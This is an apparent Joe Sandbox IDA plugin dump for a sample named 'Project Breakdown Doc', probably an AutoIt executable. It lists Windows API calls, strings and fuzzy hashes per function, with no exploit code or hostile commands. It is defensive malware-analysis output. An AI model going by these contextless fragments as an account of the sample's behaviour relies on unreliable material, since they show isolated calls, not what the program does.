                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                  • String ID:
                                                  • API String ID: 3824534824-0
                                                  • Opcode ID: 7483ee12d29fa70a7c848a6032ab614cf17907799e12902800a9bbbc0479ce65
                                                  • Instruction ID: 81986a650e2955498b38ec32df4189a9c1b9d8207416daf467cd6d9c14ef408a
                                                  • Opcode Fuzzy Hash: 7483ee12d29fa70a7c848a6032ab614cf17907799e12902800a9bbbc0479ce65
                                                  • Instruction Fuzzy Hash: 8C11E1B2904249BFC7159BB8DC08BAE7FADEB86324F144269F928D3350D6B1CD0087B0
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C98766
                                                  • GetLastError.KERNEL32(?,00C9822A,?,?,?), ref: 00C98770
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00C9822A,?,?,?), ref: 00C9877F
                                                  • HeapAlloc.KERNEL32(00000000,?,00C9822A,?,?,?), ref: 00C98786
                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C9879D
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 842720411-0
                                                  • Opcode ID: d9b9cc48fae98399b9d04a7c02c80ebcd609f29607f246ad4b921db46559b61e
                                                  • Instruction ID: cfe4fbfe7b0bf6b6bd93d78541583689ccb3ce21215af68e91b4c3e432c2ebe3
                                                  • Opcode Fuzzy Hash: d9b9cc48fae98399b9d04a7c02c80ebcd609f29607f246ad4b921db46559b61e
                                                  • Instruction Fuzzy Hash: F201F671601204FFDB204FA6DC8CE6F7FAEEF8A755B200569F859C3260DA359D05DA60
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CA5502
                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CA5510
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CA5518
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CA5522
                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CA555E
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  • Opcode ID: 1cca9b3f5a64861c2b151537ffcd8dfed09ac9b774c9414472156e6865f43d5e
                                                  • Instruction ID: 7c48800e37d17978a8782aa98f5ec897390cdb8e9188237bcf7e011312555478
                                                  • Opcode Fuzzy Hash: 1cca9b3f5a64861c2b151537ffcd8dfed09ac9b774c9414472156e6865f43d5e
                                                  • Instruction Fuzzy Hash: A5011B75D00A1ADBCF04EFE9E888BEDBB79BB0A715F05405AE901B2150DB305655CBA1
                                                  APIs
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?,?,00C9799D), ref: 00C9766F
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?), ref: 00C9768A
                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?), ref: 00C97698
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?), ref: 00C976A8
                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?), ref: 00C976B4
                                                  Similarity
                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                  • String ID:
                                                  • API String ID: 3897988419-0
                                                  • Opcode ID: 3ae0c1e9ff9851e5ecf41e06f160fe6f5882b8650134deab1f3d01cdff7b7e35
                                                  • Instruction ID: 80881e012ae6565016ad55e691d7fa1234ef7d53861d7904a2f701a18d8ee81f
                                                  • Opcode Fuzzy Hash: 3ae0c1e9ff9851e5ecf41e06f160fe6f5882b8650134deab1f3d01cdff7b7e35
                                                  • Instruction Fuzzy Hash: 79017CB2616604BBDF109F69DC48FAE7BBEEB49751F140128FD04D2221E771DE429BA0
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C98608
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C98612
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C98621
                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C98628
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C9863E
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: a574675ef58152bd9d063400d6aeb2c2bcd0895a01585c361c112aeee6364afe
                                                  • Instruction ID: a1cb544f5c4ab823492cc8f5204dc9614881fca23d51d43eab446fd01294fa3b
                                                  • Opcode Fuzzy Hash: a574675ef58152bd9d063400d6aeb2c2bcd0895a01585c361c112aeee6364afe
                                                  • Instruction Fuzzy Hash: 02F03731201204AFEB100FA5DC8DF6F3BADEF8AB54B04042AF9498B160CA659D46DA60
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C98669
                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C98673
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C98682
                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C98689
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C9869F
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: 4eccd75d61853a7f0815c380c7d1a9d2b5969f428ccca819a684ebe7dcb2d0ba
                                                  • Instruction ID: 0c70a0c8f085248f547ee793ec05f3702e7f2594bf0bdf81b02391b5214d08f8
                                                  • Opcode Fuzzy Hash: 4eccd75d61853a7f0815c380c7d1a9d2b5969f428ccca819a684ebe7dcb2d0ba
                                                  • Instruction Fuzzy Hash: 82F04F71240204AFEB111FA5EC8CF6F3FBDFF8A754B14002AF955C7150CA65D946DA60
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C9C6BA
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C9C6D1
                                                  • MessageBeep.USER32(00000000), ref: 00C9C6E9
                                                  • KillTimer.USER32(?,0000040A), ref: 00C9C705
                                                  • EndDialog.USER32(?,00000001), ref: 00C9C71F
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  • Opcode ID: 949bcf172a71fc1433bf19797d2dfabec2b87d387f701ae3c44c197cd4651872
                                                  • Instruction ID: 3bc0a8b9f690200c11166f79213d76f9f605184a98c523c0455f45d3dca7bc3f
                                                  • Opcode Fuzzy Hash: 949bcf172a71fc1433bf19797d2dfabec2b87d387f701ae3c44c197cd4651872
                                                  • Instruction Fuzzy Hash: 17018130500704ABEF219B60DD8EFAA77B9FF00705F00066DF592A14E1DBF0AA5A8F80
                                                  APIs
                                                  • EndPath.GDI32(?), ref: 00C413BF
                                                  • StrokeAndFillPath.GDI32(?,?,00C7BAD8,00000000,?), ref: 00C413DB
                                                  • SelectObject.GDI32(?,00000000), ref: 00C413EE
                                                  • DeleteObject.GDI32 ref: 00C41401
                                                  • StrokePath.GDI32(?), ref: 00C4141C
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  • Opcode ID: 109bbbaec825f644e06d07e38cbbd593ad46a2bbc040860a668e1d6e0e72c3fb
                                                  • Instruction ID: 20dd2366e5f55f9b0b1b67ebbc0319a12fda395524b190d71eb183d9253bf452
                                                  • Opcode Fuzzy Hash: 109bbbaec825f644e06d07e38cbbd593ad46a2bbc040860a668e1d6e0e72c3fb
                                                  • Instruction Fuzzy Hash: F1F0EC30004308EBDB115F66EC0CB583FA5B701726F48C228F9AD855F1C73189A6DF61
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00CAC69D
                                                  • CoCreateInstance.OLE32(00CD2D6C,00000000,00000001,00CD2BDC,?), ref: 00CAC6B5
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                  • CoUninitialize.OLE32 ref: 00CAC922
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                  • String ID: .lnk
                                                  • API String ID: 2683427295-24824748
                                                  • Opcode ID: 3f98ac7316f61aa1a9cb34cb563a789e9e201f70fbe302f97d3886597698ee49
                                                  • Instruction ID: afe49f023e562cd9bdb042b0b717bdd56183cec817e525aa567c9a4fab534c1c
                                                  • Opcode Fuzzy Hash: 3f98ac7316f61aa1a9cb34cb563a789e9e201f70fbe302f97d3886597698ee49
                                                  • Instruction Fuzzy Hash: 0CA13C71108215AFD700EF64C881EAFB7E8FF99304F00492DF196972A2DB70EA49DB52
                                                  APIs
                                                    • Part of subcall function 00C60FF6: std::exception::exception.LIBCMT ref: 00C6102C
                                                    • Part of subcall function 00C60FF6: __CxxThrowException@8.LIBCMT ref: 00C61041
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C47BB1: _memmove.LIBCMT ref: 00C47C0B
                                                  • __swprintf.LIBCMT ref: 00C5302D
                                                  Strings
                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C52EC6
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                  • API String ID: 1943609520-557222456
                                                  • Opcode ID: f978c06314239afa9241c1490d0f5c4f56e2d6784ac11fd91a0db8758684800e
                                                  • Instruction ID: 92a1fe495220136d869e61f79f113a287daba77597d3656078bcad76f6584e58
                                                  • Opcode Fuzzy Hash: f978c06314239afa9241c1490d0f5c4f56e2d6784ac11fd91a0db8758684800e
                                                  • Instruction Fuzzy Hash: 839189351083419FCB28EF64D885D6EB7A4FF95740F04091EF9929B2A1DB30EE48EB56
                                                  APIs
                                                    • Part of subcall function 00C448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C448A1,?,?,00C437C0,?), ref: 00C448CE
                                                  • CoInitialize.OLE32(00000000), ref: 00CABC26
                                                  • CoCreateInstance.OLE32(00CD2D6C,00000000,00000001,00CD2BDC,?), ref: 00CABC3F
                                                  • CoUninitialize.OLE32 ref: 00CABC5C
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  Similarity
                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                  • String ID: .lnk
                                                  • API String ID: 2126378814-24824748
                                                  • Opcode ID: 3f97814d3a16cd2fe4a67e0d8be8cbabacaa72946dfec8cfaa15fad31909d28f
                                                  • Instruction ID: a0fa7231e2ae52a613fb973dcbe11085bb454db4763aa3316551006d6e55b5f7
                                                  • Opcode Fuzzy Hash: 3f97814d3a16cd2fe4a67e0d8be8cbabacaa72946dfec8cfaa15fad31909d28f
                                                  • Instruction Fuzzy Hash: 16A136756043169FCB10DF14C484E6ABBE5FF89318F148998F8999B3A2CB31ED45CB91
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00C652DD
                                                    • Part of subcall function 00C70340: __87except.LIBCMT ref: 00C7037B
                                                  Similarity
                                                  • API ID: ErrorHandling__87except__start
                                                  • String ID: pow
                                                  • API String ID: 2905807303-2276729525
                                                  • Opcode ID: 48fb47d998b51be59c76506470ee5d6ba6187c231f1bbb927e605b34429bba75
                                                  • Instruction ID: a4261a16e2eafda98abf5619d0fc6c72fd8ce4f4d3191678f9149a7bc10002e1
                                                  • Opcode Fuzzy Hash: 48fb47d998b51be59c76506470ee5d6ba6187c231f1bbb927e605b34429bba75
                                                  • Instruction Fuzzy Hash: 9C517861A1DA01C7CB20B725C99137E6B949B40750F30CD6AE1ED862F6EF748EC4EB46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$+
                                                  • API String ID: 0-2552117581
                                                  • Opcode ID: c4896efa98084ed92b7d3ef37a69912ebf93181fd8d128ac883b3081a988a293
                                                  • Instruction ID: b96f7bbf00a8724ff043becae27c8998574dd2993bf6ebcf5e1d28777702420f
                                                  • Opcode Fuzzy Hash: c4896efa98084ed92b7d3ef37a69912ebf93181fd8d128ac883b3081a988a293
                                                  • Instruction Fuzzy Hash: 325113765046469FDF26DF28C488AFE7BA4FF15310F244065ECA1AB2A0D7349E46C760
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memset$_memmove
                                                  • String ID: ERCP
                                                  • API String ID: 2532777613-1384759551
                                                  • Opcode ID: 4aa2dff11e707e05a7cd57561e2e1f5650fa48cb486eb577b233269765a4cdea
                                                  • Instruction ID: f1fbaa21ac25df76900e8a4c633de1be8cda45739ec2aa7d1a4cd4b2110fcb99
                                                  • Opcode Fuzzy Hash: 4aa2dff11e707e05a7cd57561e2e1f5650fa48cb486eb577b233269765a4cdea
                                                  • Instruction Fuzzy Hash: 7F51D1759003099FCB24CF65C8857AABBF4EF04315F24856EEA5ACB251E771DA88CB44
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CCF910,00000000,?,?,?,?), ref: 00CC7C4E
                                                  • GetWindowLongW.USER32 ref: 00CC7C6B
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CC7C7B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Long
                                                  • String ID: SysTreeView32
                                                  • API String ID: 847901565-1698111956
                                                  • Opcode ID: 075fb0b43ff43a007ee6b887b0d3846563bd03e7fd1f46d847bf8911248a1481
                                                  • Instruction ID: b44432487bd5d231d2362576b4dbf888cce69cdd201e7f1b667a85330f80ac09
                                                  • Opcode Fuzzy Hash: 075fb0b43ff43a007ee6b887b0d3846563bd03e7fd1f46d847bf8911248a1481
                                                  • Instruction Fuzzy Hash: 3D319E31604206ABDB118F38CC45FEA7BA9FB45324F244729F975D22E0D731ED519B60
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CC76D0
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CC76E4
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CC7708
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: SysMonthCal32
                                                  • API String ID: 2326795674-1439706946
                                                  • Opcode ID: e326b342666797789dd439feb121c1591de3e0efaa40173101f510ae80e4bc75
                                                  • Instruction ID: a4adfd0dbcbe53c5d9dba62b6c83ce7858f1d3e0a224adbf01528053c39608d4
                                                  • Opcode Fuzzy Hash: e326b342666797789dd439feb121c1591de3e0efaa40173101f510ae80e4bc75
                                                  • Instruction Fuzzy Hash: B321A132500219BBDF16CFA4CC46FEA3B79EF48714F110258FE25AB1D0DAB5AC519BA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CC6FAA
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CC6FBA
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CC6FDF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: 97e3c7cb0efef323730ab034580ef36634d8595ca9de83db1d1a877f19d97fdc
                                                  • Instruction ID: a9e9c7d1d08e4055aff3074114f97b6c219ff489193e678f91c2c8b8865efa23
                                                  • Opcode Fuzzy Hash: 97e3c7cb0efef323730ab034580ef36634d8595ca9de83db1d1a877f19d97fdc
                                                  • Instruction Fuzzy Hash: 0B219232610118BFDF118F94DC85FBB37AAEF89754F01812CFA549B190C671AC529BA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CC79E1
                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CC79F6
                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CC7A03
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: msctls_trackbar32
                                                  • API String ID: 3850602802-1010561917
                                                  • Opcode ID: 081cbccec53cd1be6850f2fbc1f1ea58d2840f9efb0ea1bff78417049cfabd0f
                                                  • Instruction ID: ffb0cbb5d8fe3aafe1c704a61d06bd5e6cd95b3c02f14d81bd78f0862447bf3b
                                                  • Opcode Fuzzy Hash: 081cbccec53cd1be6850f2fbc1f1ea58d2840f9efb0ea1bff78417049cfabd0f
                                                  • Instruction Fuzzy Hash: AC11E372244208BBEF149F61CC05FEB77A9EF89B64F01062DFA51A6090D271D851DB60
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00C44C2E), ref: 00C44CA3
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C44CB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 2574300362-192647395
                                                  • Opcode ID: f01ce3fb8d38523c9fc70b3283c685d34c7b3a79ac42f34d5d6c3dfbf4c137f8
                                                  • Instruction ID: 13261ec24143dff710cbfee9377dd65342508468c77a7255ccf0287297bc0a29
                                                  • Opcode Fuzzy Hash: f01ce3fb8d38523c9fc70b3283c685d34c7b3a79ac42f34d5d6c3dfbf4c137f8
                                                  • Instruction Fuzzy Hash: C4D01271610723CFD7205F31D958B0A76D6AF05751B29C83DD896D6150D770D881C650
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00C44CE1,?), ref: 00C44DA2
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C44DB4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-1355242751
                                                  • Opcode ID: 15ea6d681b2aa8be866a2ae432a831c966f67738b17095d0e371a066f45ee0cf
                                                  • Instruction ID: a470ea8173167b44451cf9e2b0d3292e69fcf0e69e0a8a21ffc81fba1e3193cc
                                                  • Opcode Fuzzy Hash: 15ea6d681b2aa8be866a2ae432a831c966f67738b17095d0e371a066f45ee0cf
                                                  • Instruction Fuzzy Hash: 91D01731950713CFD7209F31D808B4ABAE5AF05355B25C83ED8D6D6150EB70D880CA50
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00C44D2E,?,00C44F4F,?,00D062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C44D6F
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C44D81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-3689287502
                                                  • Opcode ID: 91026215a55d69429db419feb53ac74e885e22d8d965bf6f11fb76ad60e3703d
                                                  • Instruction ID: 2908e2b7f14647fe522fd2cff9efcc0592ec30b41e6fe0116859f95caf57d0ae
                                                  • Opcode Fuzzy Hash: 91026215a55d69429db419feb53ac74e885e22d8d965bf6f11fb76ad60e3703d
                                                  • Instruction Fuzzy Hash: F7D01731910713CFD7209F31D808B1AB6E9BF15352B25C93ED4A6D6250EB70D880CA50
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00CC12C1), ref: 00CC1080
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CC1092
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2574300362-4033151799
                                                  • Opcode ID: fa93565b8d0f27538adc9b6d51a8e3aab9142cf08eb160dfc84e74d382726e0b
                                                  • Instruction ID: 31ee27dc7a31e39b377b16cc011dd7fc1c475569bef19da39f6e6b3df5806d3b
                                                  • Opcode Fuzzy Hash: fa93565b8d0f27538adc9b6d51a8e3aab9142cf08eb160dfc84e74d382726e0b
                                                  • Instruction Fuzzy Hash: 2CD01731520712CFD7209F36D818F2E76E5AF06361F198C3EE89ADA150E770C8C0CA51
                                                  APIs
